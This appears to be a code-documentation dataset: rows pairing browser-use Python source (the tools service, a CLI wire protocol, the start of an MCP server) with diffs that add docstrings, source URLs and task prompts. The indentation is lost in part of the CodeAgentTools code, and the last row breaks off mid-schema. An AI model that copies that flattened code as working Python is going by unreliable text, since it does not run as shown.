			param_model=DoneAction,
		)
		async def done(params: DoneAction, file_system: FileSystem):
			"""Free-text done. Edge cases: memory is capped at 100 chars of the text
			(with a "N more characters" note); undisplayable files are skipped, and
			a warning is logged only when *none* of the requested files were found."""
			user_message = params.text
			len_text = len(params.text)
			len_max_memory = 100
			memory = f'Task completed: {params.success} - {params.text[:len_max_memory]}'
			if len_text > len_max_memory:
				memory += f' - {len_text - len_max_memory} more characters'
			attachments = []
			if params.files_to_display:
				if self.display_files_in_done_text:
					file_msg = ''
					for file_name in params.files_to_display:
						file_content = file_system.display_file(file_name)
						if file_content:
							file_msg += f'\n\n{file_name}:\n{file_content}'
							attachments.append(file_name)
					if file_msg:
						user_message += '\n\nAttachments:'
						user_message += file_msg
					else:
						logger.warning('Agent wanted to display files but none were found')
				else:
					for file_name in params.files_to_display:
						file_content = file_system.display_file(file_name)
						if file_content:
							attachments.append(file_name)
			# Attachment names are rewritten to absolute paths inside the FileSystem dir
			attachments = [str(file_system.get_dir() / file_name) for file_name in attachments]
			return ActionResult(
				is_done=True,
				success=params.success,
				extracted_content=user_message,
				long_term_memory=memory,
				attachments=attachments,
			)
def use_structured_output_action(self, output_model: type[T]):
	"""Switch `done` to the structured-output variant for ``output_model``.

	Stores the model and re-runs `_register_done_action`, which registers the
	structured `done` handler in place of the free-text one.
	"""
	self._output_model = output_model
	self._register_done_action(output_model)
def get_output_model(self) -> type[BaseModel] | None:
	"""Return the structured output model, or None when the free-text `done` is in use."""
	return self._output_model
# Register ---------------------------------------------------------------
def action(self, description: str, **kwargs):
	"""Decorator passthrough to ``self.registry.action`` for registering custom actions."""
	return self.registry.action(description, **kwargs)
def exclude_action(self, action_name: str) -> None:
	"""Exclude a registered action by name (delegates to the registry)."""
	self.registry.exclude_action(action_name)
def _register_click_action(self) -> None:
	"""(Re-)register the `click` action in the variant matching the current mode.

	Edge cases:
	- Any previously registered `click` is removed first, so this is safe to call
	  repeatedly (e.g. from ``set_coordinate_clicking``).
	- The coordinate-enabled variant requires *either* an index *or* both
	  coordinates; index takes precedence when both are supplied.
	"""
	# Remove existing click action if present
	if 'click' in self.registry.registry.actions:
		del self.registry.registry.actions['click']
	if self._coordinate_clicking_enabled:
		# Register click action WITH coordinate support
		@self.registry.action(
			'Click element by index or coordinates. Use coordinates only if the index is not available. Either provide coordinates or index.',
			param_model=ClickElementAction,
		)
		async def click(params: ClickElementAction, browser_session: BrowserSession):
			# Validate that either index or coordinates are provided
			if params.index is None and (params.coordinate_x is None or params.coordinate_y is None):
				return ActionResult(error='Must provide either index or both coordinate_x and coordinate_y')
			# Try index-based clicking first if index is provided
			if params.index is not None:
				return await self._click_by_index(params, browser_session)
			# Coordinate-based clicking when index is not provided
			else:
				return await self._click_by_coordinate(params, browser_session)
	else:
		# Register click action WITHOUT coordinate support (index only)
		@self.registry.action(
			'Click element by index.',
			param_model=ClickElementActionIndexOnly,
		)
		async def click(params: ClickElementActionIndexOnly, browser_session: BrowserSession):
			return await self._click_by_index(params, browser_session)
def set_coordinate_clicking(self, enabled: bool) -> None:
	"""Toggle coordinate-based clicking, re-registering `click` on a real change.

	Calling with the current value is a no-op (no re-registration, no logging).
	"""
	if enabled != self._coordinate_clicking_enabled:
		self._coordinate_clicking_enabled = enabled
		self._register_click_action()
		state = 'enabled' if enabled else 'disabled'
		logger.debug(f'Coordinate clicking {state}')
# Act --------------------------------------------------------------------
@observe_debug(ignore_input=True, ignore_output=True, name='act')
@time_execution_sync('--act')
async def act(
	self,
	action: ActionModel,
	browser_session: BrowserSession,
	page_extraction_llm: BaseChatModel | None = None,
	sensitive_data: dict[str, str | dict[str, str]] | None = None,
	available_file_paths: list[str] | None = None,
	file_system: FileSystem | None = None,
	extraction_schema: dict | None = None,
) -> ActionResult:
	"""Execute the action set on ``action`` and normalize its result.

	Edge cases:
	- ``exclude_unset=True`` means only fields explicitly set on the ActionModel
	  are considered; the first field with non-None params is executed and its
	  result returned immediately (only one action runs per call).
	- If every field's params are None, an empty ActionResult is returned.
	- BrowserError / TimeoutError / generic exceptions are each converted to an
	  error ActionResult rather than propagating.
	- A plain-string handler result is wrapped; ``None`` becomes an empty
	  ActionResult; any other type raises ValueError.
	- Laminar tracing is optional — a null context is used when it is unavailable.
	"""
	for action_name, params in action.model_dump(exclude_unset=True).items():
		if params is not None:
			# Use Laminar span if available, otherwise use no-op context manager
			if Laminar is not None:
				span_context = Laminar.start_as_current_span(
					name=action_name,
					input={
						'action': action_name,
						'params': params,
					},
					span_type='TOOL',
				)
			else:
				# No-op context manager when lmnr is not available
				from contextlib import nullcontext
				span_context = nullcontext()
			with span_context:
				try:
					result = await self.registry.execute_action(
						action_name=action_name,
						params=params,
						browser_session=browser_session,
						page_extraction_llm=page_extraction_llm,
						file_system=file_system,
						sensitive_data=sensitive_data,
						available_file_paths=available_file_paths,
						extraction_schema=extraction_schema,
					)
				except BrowserError as e:
					logger.error(f'❌ Action {action_name} failed with BrowserError: {str(e)}')
					result = handle_browser_error(e)
				except TimeoutError as e:
					logger.error(f'❌ Action {action_name} failed with TimeoutError: {str(e)}')
					result = ActionResult(error=f'{action_name} was not executed due to timeout.')
				except Exception as e:
					# Log the original exception with traceback for observability
					logger.error(f"Action '{action_name}' failed with error: {str(e)}")
					result = ActionResult(error=str(e))
				if Laminar is not None:
					Laminar.set_span_output(result)
				if isinstance(result, str):
					return ActionResult(extracted_content=result)
				elif isinstance(result, ActionResult):
					return result
				elif result is None:
					return ActionResult()
				else:
					raise ValueError(f'Invalid action result type: {type(result)} of {result}')
	return ActionResult()
def __getattr__(self, name: str):
	"""Expose registered actions as awaitable attributes (``tools.scroll(...)``).

	Edge cases:
	- Only names present in the action registry are resolved; anything else raises
	  AttributeError so normal attribute lookup semantics are preserved.
	- ``browser_session`` is pulled from kwargs and passed positionally to
	  ``act()``; if the caller omits it, ``None`` is forwarded.
	- Injected-dependency kwargs are separated from action params, so the pydantic
	  param model only sees the action's own fields.
	"""
	# Check if this is a registered action
	if name in self.registry.registry.actions:
		from typing import Union
		from pydantic import create_model
		action = self.registry.registry.actions[name]
		# Create a wrapper that calls act() to ensure consistent error handling and result normalization
		async def action_wrapper(**kwargs):
			# Extract browser_session (required positional argument for act())
			browser_session = kwargs.get('browser_session')
			# Separate action params from special params (injected dependencies)
			special_param_names = {
				'browser_session',
				'page_extraction_llm',
				'file_system',
				'available_file_paths',
				'sensitive_data',
				'extraction_schema',
			}
			# Extract action params (params for the action itself)
			action_params = {k: v for k, v in kwargs.items() if k not in special_param_names}
			# Extract special params (injected dependencies) - exclude browser_session as it's positional
			special_kwargs = {k: v for k, v in kwargs.items() if k in special_param_names and k != 'browser_session'}
			# Create the param instance
			params_instance = action.param_model(**action_params)
			# Dynamically create an ActionModel with this action
			# Use Union for type compatibility with create_model
			DynamicActionModel = create_model(
				'DynamicActionModel',
				__base__=ActionModel,
				**{name: (Union[action.param_model, None], None)},  # type: ignore
			)
			# Create the action model instance
			action_model = DynamicActionModel(**{name: params_instance})
			# Call act() which has all the error handling, result normalization, and observability
			# browser_session is passed as positional argument (required by act())
			return await self.act(action=action_model, browser_session=browser_session, **special_kwargs)  # type: ignore
		return action_wrapper
	# If not an action, raise AttributeError for normal Python behavior
	raise AttributeError(f"'{type(self).__name__}' object has no attribute '{name}'")
# Alias for backwards compatibility
Controller = Tools
class CodeAgentTools(Tools[Context]):
def __init__(
	self,
	exclude_actions: list[str] | None = None,
	output_model: type[T] | None = None,
	display_files_in_done_text: bool = True,
):
	"""Build a Tools registry specialized for the CodeAgent.

	Edge cases:
	- When ``exclude_actions`` is None, a CodeAgent-specific default exclusion
	  list applies (extraction/file-system actions are replaced by Python +
	  ``evaluate``); passing an explicit list — even ``[]`` — overrides it.
	- After parent initialization, the `done` action is re-registered with the
	  CodeAgent variant (enhanced file handling) for the free-text case.
	"""
	# Default exclusions for CodeAgent agent
	if exclude_actions is None:
		exclude_actions = [
			# 'scroll', # Keep for code-use
			'extract',  # Exclude - use Python + evaluate()
			'find_text',  # Exclude - use Python string ops
			# 'select_dropdown', # Keep for code-use
			# 'dropdown_options', # Keep for code-use
			'screenshot',  # Exclude - not needed
			'search',  # Exclude - use navigate() directly
			# 'click', # Keep for code-use
			# 'input', # Keep for code-use
			# 'switch', # Keep for code-use
			# 'send_keys', # Keep for code-use
			# 'close', # Keep for code-use
			# 'go_back', # Keep for code-use
			# 'upload_file', # Keep for code-use
			# Exclude file system actions - CodeAgent should use Python file operations
			'write_file',
			'read_file',
			'replace_file',
		]
	super().__init__(
		exclude_actions=exclude_actions,
		output_model=output_model,
		display_files_in_done_text=display_files_in_done_text,
	)
	# Override done action for CodeAgent with enhanced file handling
	self._register_code_use_done_action(output_model, display_files_in_done_text)
def _register_code_use_done_action(self, output_model: type[T] | None, display_files_in_done_text: bool = True):
if output_model is not None:
# Structured output done - use parent's implementation
return
# Override the done action with enhanced version
@self.registry.action(
'Complete task.',
param_model=DoneAction,
)
async def done(params: DoneAction, file_system: FileSystem):
user_message = params.text
len_text = len(params.text)
len_max_memory = 100
memory = f'Task completed: {params.success} - {params.text[:len_max_memory]}'
if len_text > len_max_memory:
memory += f' - {len_text - len_max_memory} more characters'
attachments = []
if params.files_to_display:
if self.display_files_in_done_text:
file_msg = ''
for file_name in params.files_to_display:
file_content = file_system.display_file(file_name)
if file_content:
file_msg += f'\n\n{file_name}:\n{file_content}'
attachments.append(file_name)
elif os.path.exists(file_name):
# File exists on disk but not in FileSystem - just add to attachments
attachments.append(file_name)
if file_msg:
user_message += '\n\nAttachments:'
user_message += file_msg
else:
logger.warning('Agent wanted to display files but none were found')
else:
for file_name in params.files_to_display:
file_content = file_system.display_file(file_name)
if file_content:
attachments.append(file_name)
elif os.path.exists(file_name):
attachments.append(file_name)
# Convert relative paths to absolute paths - handle both FileSystem-managed and regular files
resolved_attachments = []
for file_name in attachments:
if os.path.isabs(file_name):
# Already absolute
resolved_attachments.append(file_name)
elif file_system.get_file(file_name):
# Managed by FileSystem
resolved_attachments.append(str(file_system.get_dir() / file_name))
elif os.path.exists(file_name):
# Regular file in current directory
resolved_attachments.append(os.path.abspath(file_name))
else:
# File doesn't exist, but include the path anyway for error visibility
resolved_attachments.append(str(file_system.get_dir() / file_name))
attachments = resolved_attachments
return ActionResult(
is_done=True,
success=params.success,
extracted_content=user_message,
long_term_memory=memory,
attachments=attachments,
)
# Override upload_file for code agent with relaxed path validation
@self.registry.action(
'Upload a file to a file input element. For code-use mode, any file accessible from the current directory can be uploaded.',
param_model=UploadFileAction,
)
async def upload_file(
params: UploadFileAction,
browser_session: BrowserSession,
available_file_paths: list[str],
file_system: FileSystem,
):
# Path validation logic for code-use mode:
# 1. If available_file_paths provided (security mode), enforce it as a whitelist
# 2. If no whitelist, for local browsers just check file exists
# 3. For remote browsers, allow any path (assume it exists remotely)
# If whitelist provided, validate path is in it
if available_file_paths:
if params.path not in available_file_paths:
# Also check if it's a recently downloaded file
downloaded_files = browser_session.downloaded_files
if params.path not in downloaded_files:
# Finally, check if it's a file in the FileSystem service (if provided)
if file_system is not None and file_system.get_dir():
# Check if the file is actually managed by the FileSystem service
# The path should be just the filename for FileSystem files
file_obj = file_system.get_file(params.path)
if file_obj:
# File is managed by FileSystem, construct the full path
file_system_path = str(file_system.get_dir() / params.path)
params = UploadFileAction(index=params.index, path=file_system_path)
else:
# If browser is remote, allow passing a remote-accessible absolute path
if not browser_session.is_local:
pass
else:
msg = f'File path {params.path} is not available. To fix: add this file path to the available_file_paths parameter when creating the Agent. Example: Agent(task="...", llm=llm, browser=browser, available_file_paths=["{params.path}"])'
logger.error(f'❌ {msg}')
return ActionResult(error=msg)
else:
# If browser is remote, allow passing a remote-accessible absolute path
if not browser_session.is_local:
pass
else:
msg = f'File path {params.path} is not available. To fix: add this file path to the available_file_paths parameter when creating the Agent. Example: Agent(task="...", llm=llm, browser=browser, available_file_paths=["{params.path}"])'
logger.error(f'❌ {msg}')
return ActionResult(error=msg)
# For local browsers, ensure the file exists on the local filesystem
if browser_session.is_local:
if not os.path.exists(params.path):
msg = f'File {params.path} does not exist'
return ActionResult(error=msg)
# Get the selector map to find the node
selector_map = await browser_session.get_selector_map()
if params.index not in selector_map:
msg = f'Element with index {params.index} does not exist.'
return ActionResult(error=msg)
node = selector_map[params.index]
# Helper function to find file input near the selected element
def find_file_input_near_element(
node: EnhancedDOMTreeNode, max_height: int = 3, max_descendant_depth: int = 3
) -> EnhancedDOMTreeNode | None:
def find_file_input_in_descendants(n: EnhancedDOMTreeNode, depth: int) -> EnhancedDOMTreeNode | None:
if depth < 0:
return None
if browser_session.is_file_input(n):
return n
for child in n.children_nodes or []:
result = find_file_input_in_descendants(child, depth - 1)
if result:
return result
return None
current = node
for _ in range(max_height + 1):
# Check the current node itself
if browser_session.is_file_input(current):
return current
# Check all descendants of the current node
result = find_file_input_in_descendants(current, max_descendant_depth)
if result:
return result
# Check all siblings and their descendants
if current.parent_node:
for sibling in current.parent_node.children_nodes or []:
if sibling is current:
continue
if browser_session.is_file_input(sibling):
return sibling
result = find_file_input_in_descendants(sibling, max_descendant_depth)
if result:
return result
current = current.parent_node
if not current:
break
return None
# Try to find a file input element near the selected element
file_input_node = find_file_input_near_element(node)
# Highlight the file input element if found (truly non-blocking)
if file_input_node:
create_task_with_error_handling(
browser_session.highlight_interaction_element(file_input_node),
name='highlight_file_input',
suppress_exceptions=True,
)
# If not found near the selected element, fallback to finding the closest file input to current scroll position
if file_input_node is None:
logger.info(
f'No file upload element found near index {params.index}, searching for closest file input to scroll position'
)
# Get current scroll position
cdp_session = await browser_session.get_or_create_cdp_session()
try:
scroll_info = await cdp_session.cdp_client.send.Runtime.evaluate(
params={'expression': 'window.scrollY || window.pageYOffset || 0'}, session_id=cdp_session.session_id
)
current_scroll_y = scroll_info.get('result', {}).get('value', 0)
except Exception:
current_scroll_y = 0
# Find all file inputs in the selector map and pick the closest one to scroll position
closest_file_input = None
min_distance = float('inf')
for idx, element in selector_map.items():
if browser_session.is_file_input(element):
# Get element's Y position
if element.absolute_position:
element_y = element.absolute_position.y
distance = abs(element_y - current_scroll_y)
if distance < min_distance:
min_distance = distance
closest_file_input = element
if closest_file_input:
file_input_node = closest_file_input
logger.info(f'Found file input closest to scroll position (distance: {min_distance}px)')
# Highlight the fallback file input element (truly non-blocking)
create_task_with_error_handling(
browser_session.highlight_interaction_element(file_input_node),
name='highlight_file_input_fallback',
suppress_exceptions=True,
)
else:
msg = 'No file upload element found on the page'
logger.error(msg)
raise BrowserError(msg)
# TODO: figure out why this fails sometimes + add fallback hail mary, just look for any file input on page
# Dispatch upload file event with the file input node
try:
event = browser_session.event_bus.dispatch(UploadFileEvent(node=file_input_node, file_path=params.path))
await event
await event.event_result(raise_if_any=True, raise_if_none=False)
msg = f'Successfully uploaded file to index {params.index}'
logger.info(f'📁 {msg}')
return ActionResult(
extracted_content=msg,
long_term_memory=f'Uploaded file {params.path} to element {params.index}',
)
except Exception as e:
logger.error(f'Failed to upload file: {e}')
raise BrowserError(f'Failed to upload file: {e}') | --- +++ @@ -75,6 +75,7 @@
def _detect_sensitive_key_name(text: str, sensitive_data: dict[str, str | dict[str, str]] | None) -> str | None:
+ """Detect which sensitive key name corresponds to the given text value."""
if not sensitive_data or not text:
return None
@@ -230,6 +231,7 @@ css_scope: str | None,
max_results: int,
) -> str:
+ """Build JS IIFE for search_page with safe parameter injection."""
params_js = (
f'var PATTERN = {json.dumps(pattern)};\n'
f'var IS_REGEX = {json.dumps(regex)};\n'
@@ -247,6 +249,7 @@ max_results: int,
include_text: bool,
) -> str:
+ """Build JS IIFE for find_elements with safe parameter injection."""
params_js = (
f'var SELECTOR = {json.dumps(selector)};\n'
f'var ATTRIBUTES = {json.dumps(attributes)};\n'
@@ -257,6 +260,7 @@
def _format_search_results(data: dict, pattern: str) -> str:
+ """Format search_page CDP result into human-readable text for the agent."""
if not isinstance(data, dict):
return f'search_page returned unexpected result: {data}'
@@ -282,6 +286,7 @@
def _format_find_results(data: dict, selector: str) -> str:
+ """Format find_elements CDP result into human-readable text for the agent."""
if not isinstance(data, dict):
return f'find_elements returned unexpected result: {data}'
@@ -322,6 +327,7 @@
def _is_autocomplete_field(node: EnhancedDOMTreeNode) -> bool:
+ """Detect if a node is an autocomplete/combobox field from its attributes."""
attrs = node.attributes or {}
if attrs.get('role') == 'combobox':
return True
@@ -492,6 +498,7 @@
# Helper function for coordinate conversion
def _convert_llm_coordinates_to_viewport(llm_x: int, llm_y: int, browser_session: BrowserSession) -> tuple[int, int]:
+ """Convert coordinates from LLM screenshot size to original viewport size."""
if browser_session.llm_screenshot_size and browser_session._original_viewport_size:
original_width, original_height = browser_session._original_viewport_size
llm_width, llm_height = browser_session.llm_screenshot_size
@@ -512,6 +519,9 @@ browser_session: BrowserSession,
tabs_before: set[str],
) -> str:
+ """Detect if a click opened a new tab, and return a note for the agent.
+ Waits briefly for CDP events to propagate, then checks if any new tabs appeared.
+ """
try:
# Brief delay to allow CDP Target.attachedToTarget events to propagate
# and be processed by SessionManager._handle_target_attached
@@ -786,6 +796,7 @@ def find_file_input_near_element(
node: EnhancedDOMTreeNode, max_height: int = 3, max_descendant_depth: int = 3
) -> EnhancedDOMTreeNode | None:
+ """Find the closest file input to the selected element."""
def find_file_input_in_descendants(n: EnhancedDOMTreeNode, depth: int) -> EnhancedDOMTreeNode | None:
if depth < 0:
@@ -1412,6 +1423,7 @@ browser_session: BrowserSession,
file_system: FileSystem,
):
+ """Take screenshot, optionally saving to file."""
if params.file_name:
# Save screenshot to file
file_name = params.file_name
@@ -1451,6 +1463,7 @@ browser_session: BrowserSession,
file_system: FileSystem,
):
+ """Save the current page as a PDF using CDP Page.printToPDF."""
import base64
import re
@@ -1535,6 +1548,7 @@ param_model=GetDropdownOptionsAction,
)
async def dropdown_options(params: GetDropdownOptionsAction, browser_session: BrowserSession):
+ """Get all options from a native dropdown or ARIA menu"""
# Look up the node from the selector map
node = await browser_session.get_element_by_index(params.index)
if node is None:
@@ -1562,6 +1576,7 @@ param_model=SelectDropdownOptionAction,
)
async def select_dropdown(params: SelectDropdownOptionAction, browser_session: BrowserSession):
+ """Select dropdown option by the text of the option you want to select"""
# Look up the node from the selector map
node = await browser_session.get_element_by_index(params.index)
if node is None:
@@ -1791,6 +1806,7 @@ return ActionResult(error=error_msg)
def _validate_and_fix_javascript(self, code: str) -> str:
+ """Validate and fix common JavaScript issues before execution"""
import re
@@ -1943,17 +1959,31 @@ self._register_done_action(output_model)
def get_output_model(self) -> type[BaseModel] | None:
+ """Get the output model if structured output is configured."""
return self._output_model
# Register ---------------------------------------------------------------
def action(self, description: str, **kwargs):
+ """Decorator for registering custom actions
+
+ @param description: Describe the LLM what the function does (better description == better function calling)
+ """
return self.registry.action(description, **kwargs)
def exclude_action(self, action_name: str) -> None:
+ """Exclude an action from the tools registry.
+
+ This method can be used to remove actions after initialization,
+ useful for enforcing constraints like disabling screenshot when use_vision != 'auto'.
+
+ Args:
+ action_name: Name of the action to exclude (e.g., 'screenshot')
+ """
self.registry.exclude_action(action_name)
def _register_click_action(self) -> None:
+ """Register the click action with or without coordinate support based on current setting."""
# Remove existing click action if present
if 'click' in self.registry.registry.actions:
del self.registry.registry.actions['click']
@@ -1985,6 +2015,20 @@ return await self._click_by_index(params, browser_session)
def set_coordinate_clicking(self, enabled: bool) -> None:
+ """Enable or disable coordinate-based clicking.
+
+ When enabled, the click action accepts both index and coordinate parameters.
+ When disabled (default), only index-based clicking is available.
+
+ This is automatically enabled for models that support coordinate clicking:
+ - claude-sonnet-4-5
+ - claude-opus-4-5
+ - gemini-3-pro
+ - browser-use/* models
+
+ Args:
+ enabled: True to enable coordinate clicking, False to disable
+ """
if enabled == self._coordinate_clicking_enabled:
return # No change needed
@@ -2005,6 +2049,7 @@ file_system: FileSystem | None = None,
extraction_schema: dict | None = None,
) -> ActionResult:
+ """Execute an action"""
for action_name, params in action.model_dump(exclude_unset=True).items():
if params is not None:
@@ -2061,6 +2106,10 @@ return ActionResult()
def __getattr__(self, name: str):
+ """
+ Enable direct action calls like tools.navigate(url=..., browser_session=...).
+ This provides a simpler API for tests and direct usage while maintaining backward compatibility.
+ """
# Check if this is a registered action
if name in self.registry.registry.actions:
from typing import Union
@@ -2119,6 +2168,23 @@
class CodeAgentTools(Tools[Context]):
+ """Specialized Tools for CodeAgent agent optimized for Python-based browser automation.
+
+ Includes:
+ - All browser interaction tools (click, input, scroll, navigate, etc.)
+ - JavaScript evaluation
+ - Tab management (switch, close)
+ - Navigation actions (go_back)
+ - Upload file support
+ - Dropdown interactions
+
+ Excludes (optimized for code-use mode):
+ - extract: Use Python + evaluate() instead
+ - find_text: Use Python string operations
+ - screenshot: Not needed in code-use mode
+ - search: Use navigate() directly
+ - File system actions (write_file, read_file, replace_file): Use Python file operations instead
+ """
def __init__(
self,
@@ -2159,6 +2225,7 @@ self._register_code_use_done_action(output_model, display_files_in_done_text)
def _register_code_use_done_action(self, output_model: type[T] | None, display_files_in_done_text: bool = True):
+ """Register enhanced done action for CodeAgent that can read files from disk."""
if output_model is not None:
# Structured output done - use parent's implementation
return
@@ -2293,6 +2360,7 @@ def find_file_input_near_element(
node: EnhancedDOMTreeNode, max_height: int = 3, max_descendant_depth: int = 3
) -> EnhancedDOMTreeNode | None:
+ """Find the closest file input to the selected element."""
def find_file_input_in_descendants(n: EnhancedDOMTreeNode, depth: int) -> EnhancedDOMTreeNode | None:
if depth < 0:
@@ -2399,4 +2467,4 @@ )
except Exception as e:
logger.error(f'Failed to upload file: {e}')
- raise BrowserError(f'Failed to upload file: {e}')+ raise BrowserError(f'Failed to upload file: {e}')
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/tools/service.py |
Add docstrings to meet PEP guidelines |
import json
from dataclasses import asdict, dataclass, field
from typing import Any
@dataclass
class Request:
id: str
action: str
session: str
params: dict[str, Any] = field(default_factory=dict)
def to_json(self) -> str:
return json.dumps(asdict(self))
@classmethod
def from_json(cls, data: str) -> 'Request':
d = json.loads(data)
return cls(
id=d['id'],
action=d['action'],
session=d['session'],
params=d.get('params', {}),
)
@dataclass
class Response:
id: str
success: bool
data: Any = None
error: str | None = None
def to_json(self) -> str:
return json.dumps(asdict(self))
@classmethod
def from_json(cls, data: str) -> 'Response':
d = json.loads(data)
return cls(
id=d['id'],
success=d['success'],
data=d.get('data'),
error=d.get('error'),
) | --- +++ @@ -1,3 +1,7 @@+"""Wire protocol for CLI↔Server communication.
+
+Uses JSON over Unix sockets (or TCP on Windows) with newline-delimited messages.
+"""
import json
from dataclasses import asdict, dataclass, field
@@ -6,6 +10,7 @@
@dataclass
class Request:
+ """Command request from CLI to server."""
id: str
action: str
@@ -28,6 +33,7 @@
@dataclass
class Response:
+ """Response from server to CLI."""
id: str
success: bool
@@ -45,4 +51,4 @@ success=d['success'],
data=d.get('data'),
error=d.get('error'),
- )+ )
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/protocol.py |
Write docstrings describing functionality |
import os
import sys
# Set environment variables BEFORE any browser_use imports to prevent early logging
os.environ['BROWSER_USE_LOGGING_LEVEL'] = 'critical'
os.environ['BROWSER_USE_SETUP_LOGGING'] = 'false'
import asyncio
import json
import logging
import time
from pathlib import Path
from typing import Any
from browser_use.llm import ChatAWSBedrock
# Configure logging for MCP mode - redirect to stderr but preserve critical diagnostics
logging.basicConfig(
stream=sys.stderr, level=logging.WARNING, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', force=True
)
try:
import psutil
PSUTIL_AVAILABLE = True
except ImportError:
PSUTIL_AVAILABLE = False
# Add browser-use to path if running from source
sys.path.insert(0, str(Path(__file__).parent.parent))
# Import and configure logging to use stderr before other imports
from browser_use.logging_config import setup_logging
def _configure_mcp_server_logging():
# Set environment to suppress browser-use logging during server mode
os.environ['BROWSER_USE_LOGGING_LEVEL'] = 'warning'
os.environ['BROWSER_USE_SETUP_LOGGING'] = 'false' # Prevent automatic logging setup
# Configure logging to stderr for MCP mode - preserve warnings and above for troubleshooting
setup_logging(stream=sys.stderr, log_level='warning', force_setup=True)
# Also configure the root logger and all existing loggers to use stderr
logging.root.handlers = []
stderr_handler = logging.StreamHandler(sys.stderr)
stderr_handler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
logging.root.addHandler(stderr_handler)
logging.root.setLevel(logging.CRITICAL)
# Configure all existing loggers to use stderr and CRITICAL level
for name in list(logging.root.manager.loggerDict.keys()):
logger_obj = logging.getLogger(name)
logger_obj.handlers = []
logger_obj.setLevel(logging.CRITICAL)
logger_obj.addHandler(stderr_handler)
logger_obj.propagate = False
# Configure MCP server logging before any browser_use imports to capture early log lines
_configure_mcp_server_logging()
# Additional suppression - disable all logging completely for MCP mode
logging.disable(logging.CRITICAL)
# Import browser_use modules
from browser_use import ActionModel, Agent
from browser_use.browser import BrowserProfile, BrowserSession
from browser_use.config import get_default_llm, get_default_profile, load_browser_use_config
from browser_use.filesystem.file_system import FileSystem
from browser_use.llm.openai.chat import ChatOpenAI
from browser_use.tools.service import Tools
logger = logging.getLogger(__name__)
def _ensure_all_loggers_use_stderr():
# Get the stderr handler
stderr_handler = None
for handler in logging.root.handlers:
if hasattr(handler, 'stream') and handler.stream == sys.stderr: # type: ignore
stderr_handler = handler
break
if not stderr_handler:
stderr_handler = logging.StreamHandler(sys.stderr)
stderr_handler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
# Configure root logger
logging.root.handlers = [stderr_handler]
logging.root.setLevel(logging.CRITICAL)
# Configure all existing loggers
for name in list(logging.root.manager.loggerDict.keys()):
logger_obj = logging.getLogger(name)
logger_obj.handlers = [stderr_handler]
logger_obj.setLevel(logging.CRITICAL)
logger_obj.propagate = False
# Ensure stderr logging after all imports
_ensure_all_loggers_use_stderr()
# Try to import MCP SDK
try:
import mcp.server.stdio
import mcp.types as types
from mcp.server import NotificationOptions, Server
from mcp.server.models import InitializationOptions
MCP_AVAILABLE = True
# Configure MCP SDK logging to stderr as well
mcp_logger = logging.getLogger('mcp')
mcp_logger.handlers = []
mcp_logger.addHandler(logging.root.handlers[0] if logging.root.handlers else logging.StreamHandler(sys.stderr))
mcp_logger.setLevel(logging.ERROR)
mcp_logger.propagate = False
except ImportError:
MCP_AVAILABLE = False
logger.error('MCP SDK not installed. Install with: pip install mcp')
sys.exit(1)
from browser_use.telemetry import MCPServerTelemetryEvent, ProductTelemetry
from browser_use.utils import create_task_with_error_handling, get_browser_use_version
def get_parent_process_cmdline() -> str | None:
if not PSUTIL_AVAILABLE:
return None
try:
cmdlines = []
current_process = psutil.Process()
parent = current_process.parent()
while parent:
try:
cmdline = parent.cmdline()
if cmdline:
cmdlines.append(' '.join(cmdline))
except (psutil.AccessDenied, psutil.NoSuchProcess):
# Skip processes we can't access (like system processes)
pass
try:
parent = parent.parent()
except (psutil.AccessDenied, psutil.NoSuchProcess):
# Can't go further up the chain
break
return ';'.join(cmdlines) if cmdlines else None
except Exception:
# If we can't get parent process info, just return None
return None
class BrowserUseServer:
def __init__(self, session_timeout_minutes: int = 10):
# Ensure all logging goes to stderr (in case new loggers were created)
_ensure_all_loggers_use_stderr()
self.server = Server('browser-use')
self.config = load_browser_use_config()
self.agent: Agent | None = None
self.browser_session: BrowserSession | None = None
self.tools: Tools | None = None
self.llm: ChatOpenAI | None = None
self.file_system: FileSystem | None = None
self._telemetry = ProductTelemetry()
self._start_time = time.time()
# Session management
self.active_sessions: dict[str, dict[str, Any]] = {} # session_id -> session info
self.session_timeout_minutes = session_timeout_minutes
self._cleanup_task: Any = None
# Setup handlers
self._setup_handlers()
def _setup_handlers(self):
@self.server.list_tools()
async def handle_list_tools() -> list[types.Tool]:
return [
# Agent tools
# Direct browser control tools
types.Tool(
name='browser_navigate',
description='Navigate to a URL in the browser',
inputSchema={
'type': 'object',
'properties': {
'url': {'type': 'string', 'description': 'The URL to navigate to'},
'new_tab': {'type': 'boolean', 'description': 'Whether to open in a new tab', 'default': False},
},
'required': ['url'],
},
),
types.Tool(
name='browser_click',
description='Click an element by index or at specific viewport coordinates. Use index for elements from browser_get_state, or coordinate_x/coordinate_y for pixel-precise clicking.',
inputSchema={
'type': 'object',
'properties': {
'index': {
'type': 'integer',
'description': 'The index of the element to click (from browser_get_state). Use this OR coordinates.',
},
'coordinate_x': {
'type': 'integer',
'description': 'X coordinate (pixels from left edge of viewport). Use with coordinate_y.',
},
'coordinate_y': {
'type': 'integer',
'description': 'Y coordinate (pixels from top edge of viewport). Use with coordinate_x.',
},
'new_tab': {
'type': 'boolean',
'description': 'Whether to open any resulting navigation in a new tab',
'default': False,
},
},
'oneOf': [
{'required': ['index']},
{'required': ['coordinate_x', 'coordinate_y']},
],
},
),
types.Tool(
name='browser_type',
description='Type text into an input field',
inputSchema={
'type': 'object',
'properties': {
'index': {
'type': 'integer',
'description': 'The index of the input element (from browser_get_state)',
},
'text': {'type': 'string', 'description': 'The text to type'},
},
'required': ['index', 'text'],
},
),
types.Tool(
name='browser_get_state',
description='Get the current state of the page including all interactive elements',
inputSchema={
'type': 'object',
'properties': {
'include_screenshot': {
'type': 'boolean',
'description': 'Whether to include a screenshot of the current page',
'default': False,
}
},
},
),
types.Tool(
name='browser_extract_content',
description='Extract structured content from the current page based on a query',
inputSchema={
'type': 'object',
'properties': {
'query': {'type': 'string', 'description': 'What information to extract from the page'},
'extract_links': {
'type': 'boolean',
'description': 'Whether to include links in the extraction',
'default': False,
},
},
'required': ['query'],
},
),
types.Tool(
name='browser_get_html',
description='Get the raw HTML of the current page or a specific element by CSS selector',
inputSchema={
'type': 'object',
'properties': {
'selector': {
'type': 'string',
